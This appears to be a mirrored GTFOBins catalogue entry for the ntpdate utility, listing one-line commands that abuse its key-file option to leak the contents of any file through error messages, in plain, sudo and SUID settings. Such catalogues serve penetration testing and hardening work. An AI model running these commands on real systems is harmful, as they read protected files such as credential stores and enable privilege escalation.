mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 14:59:44 +01:00
17 lines
396 B
Markdown
17 lines
396 B
Markdown
|
---
|
||
|
description: The file is actually parsed and lines are leaked through error messages.
|
||
|
functions:
|
||
|
file-read:
|
||
|
- code: |
|
||
|
LFILE=file_to_read
|
||
|
ntpdate -a x -k $LFILE -d localhost
|
||
|
sudo:
|
||
|
- code: |
|
||
|
LFILE=file_to_read
|
||
|
sudo ntpdate -a x -k $LFILE -d localhost
|
||
|
suid:
|
||
|
- code: |
|
||
|
LFILE=file_to_read
|
||
|
./ntpdate -a x -k $LFILE -d localhost
|
||
|
---
|